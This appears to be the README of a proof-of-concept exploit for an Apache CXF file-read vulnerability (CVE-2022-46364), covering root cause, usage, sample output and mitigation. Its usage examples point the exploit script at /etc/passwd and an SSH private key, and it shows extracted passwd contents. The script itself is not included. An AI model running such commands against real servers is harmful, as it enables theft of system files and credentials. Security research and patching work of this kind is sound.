Share
## https://sploitus.com/exploit?id=2B6C4BC9-E4E5-57A7-844D-6BD111631E2A
# Apache CXF XOP Include LFI (CVE-2022-46364)

## Overview

This repository contains a Proof-of-Concept (PoC) exploit for **CVE-2022-46364**, a Local File Inclusion (LFI) vulnerability in Apache CXF.

The vulnerability arises due to improper handling of **XOP (XML-binary Optimized Packaging) Include** elements in SOAP requests, allowing attackers to read arbitrary files from the server.

---

## Vulnerability Details

* **CVE ID:** CVE-2022-46364
* **Component:** Apache CXF
* **Vulnerability Type:** Local File Inclusion (LFI)
* **Attack Vector:** Remote (unauthenticated in some cases)
* **Impact:** Arbitrary file read on the server

### Root Cause

Apache CXF improperly processes `` elements inside SOAP requests.
By supplying a crafted `href` (e.g., `file:///etc/passwd`), the server may include and return local file contents.

---

## Affected Versions

* Apache CXF versions **prior to the patched release (3.4.x / 3.5.x depending on branch)**

> Always verify the exact vulnerable version in your target environment.

---

## Exploitation Flow

1. Attacker sends a crafted SOAP request
2. Includes ``
3. Server processes the request and reads the local file
4. File content is returned inside the SOAP response

---

## Repository Structure

```bash
.
โ”œโ”€โ”€ cxf_lfi.sh       # Exploit script
โ”œโ”€โ”€ README.md        # Documentation
โ”œโ”€โ”€ LICENSE          # MIT License
โ””โ”€โ”€ .gitignore
```

---

## Requirements

* Bash
* curl
* base64 (optional, for decoding output)

---

## Usage

### 1. Make script executable

```bash
chmod +x cxf_lfi.sh
```

### 2. Edit target URL

Update the target inside the script:

```bash
TARGET="http://:8080/employeeservice"
```

### 3. Run exploit

```bash
./cxf_lfi.sh file:///etc/passwd
```

---

## Example Attacks

### Example 1: Read system users

```bash
./cxf_lfi.sh file:///etc/passwd
```

### Example 2: Read application secrets

```bash
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
```

---

## Sample Output

```bash
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
```

---

## Notes & Limitations

* Some servers may:

  * Return **base64-encoded content**
  * Restrict file access via permissions
  * Sanitize or block `file://` schemes

* Output parsing depends on response format and may require manual inspection.

---

## Detection & Mitigation

### Detection

* Monitor unusual SOAP requests containing:

  * ``
  * `file://` URIs

### Mitigation

* Upgrade Apache CXF to a patched version
* Disable or restrict XOP processing if not required
* Validate and sanitize incoming SOAP payloads

---

## Ethical Use Disclaimer

This project is intended for:

* Educational purposes
* Authorized penetration testing

Do **not** use this tool on systems without explicit permission.

---

## References

* Apache CXF Security Advisories
* CVE Database (CVE-2022-46364)

---

## Author

Developed as part of security research and CTF practice.